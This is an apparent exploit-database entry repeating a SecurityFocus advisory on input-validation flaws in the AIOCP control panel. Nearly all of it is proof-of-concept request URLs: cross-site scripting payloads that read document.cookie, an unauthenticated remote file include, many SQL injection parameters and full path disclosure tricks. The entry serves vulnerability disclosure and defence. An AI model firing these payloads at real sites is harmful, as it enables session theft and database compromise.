
17 new exploits Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script Cherry Music 0.35.1 - Arbitrary File Disclosure Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation Windows x86 - Password Protected TCP Bind Shell (637 bytes) wdCalendar 2 - SQL Injection Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change Open-Xchange App Suite 7.8.2 - Cross Site Scripting Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting Multiple Icecream Apps - Insecure File Permissions Privilege Escalation WinSMS 3.43 - Insecure File Permissions Privilege Escalation Microsoft Internet Explorer 11.0.9600.18482 - Use After Free AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure AIOCP 1.3.x - Multiple Vulnerabilities ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change Inteno EG101R1 VoIP Router - Unauthenticated DNS Change
71 lines
3.9 KiB
Text
Executable file
71 lines
3.9 KiB
Text
Executable file
source: http://www.securityfocus.com/bid/20931/info
|
|
|
|
All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
|
|
|
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.
|
|
|
|
AIOCP 1.3.007 and prior versions are vulnerable.
|
|
|
|
|
|
Cross-site scripting =
|
|
-
|
|
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
|
|
-
|
|
http://www.example.com/public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>
|
|
|
|
Remote File-Include =
|
|
/admin/code/index.php?load_page=http%3A//google.com
|
|
( no login needed for the remote file include )
|
|
|
|
SQL-Injection =
|
|
- http://www.example.com/public/code/cp_dpage.php?choosed_language=[sql]
|
|
- http://www.example.com/public/code/cp_news.php?choosed_language=[sql]
|
|
- http://www.example.com/public/code/cp_news.php?news_category=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_edit_user.php?choosed_language=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql]
|
|
- http://www.example.com/public/code/cp_links.php?links_category=[sql]
|
|
- http://www.example.com/public/code/cp_links.php?choosed_language=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_contact_us.php?choosed_language=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_show_ec_products.php?order_field=[sql]
|
|
- http://www.example.com/public/code/cp_login.php?choosed_language=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
|
|
-
|
|
http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql]
|
|
- http://www.example.com/public/code/cp_links_search.php?orderdir=[sql]
|
|
|
|
|
|
Full Path Disclosure =
|
|
-
|
|
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
|
|
-
|
|
http://www.example.com/public/code/cp_show_ec_products.php?order_field[]=
|
|
- http://www.example.com/public/code/cp_show_page_help.php?hp[]=
|
|
|
|
|